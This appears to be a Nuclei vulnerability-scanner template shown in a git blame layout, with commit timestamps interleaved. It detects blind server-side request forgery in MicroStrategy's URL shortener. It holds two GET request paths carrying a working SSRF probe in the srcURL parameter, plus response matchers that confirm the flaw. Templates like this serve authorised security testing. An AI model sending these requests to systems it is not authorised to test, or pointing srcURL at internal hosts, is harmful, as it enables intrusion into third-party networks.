2020-07-02 13:53:41 +00:00
|
|
|
id: microstrategy-ssrf
|
2021-08-18 19:13:44 +00:00
|
|
|
|
2020-07-02 13:53:41 +00:00
|
|
|
info:
|
2020-08-25 19:43:43 +00:00
|
|
|
name: MicroStrategy tinyurl - BSSRF
|
2020-07-02 13:53:41 +00:00
|
|
|
author: organiccrap
|
|
|
|
severity: high
|
2020-08-25 19:43:43 +00:00
|
|
|
description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener.
|
2021-02-12 05:53:01 +00:00
|
|
|
reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
|
|
|
|
tags: microstrategy,ssrf
|
2020-08-25 19:43:43 +00:00
|
|
|
|
2020-07-02 13:53:41 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
|
|
|
- '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
2021-08-18 19:13:44 +00:00
|
|
|
|
2020-07-02 13:53:41 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- taskResponse
|
|
|
|
- The source URL is not valid
|
|
|
|
condition: and
|
|
|
|
part: body
|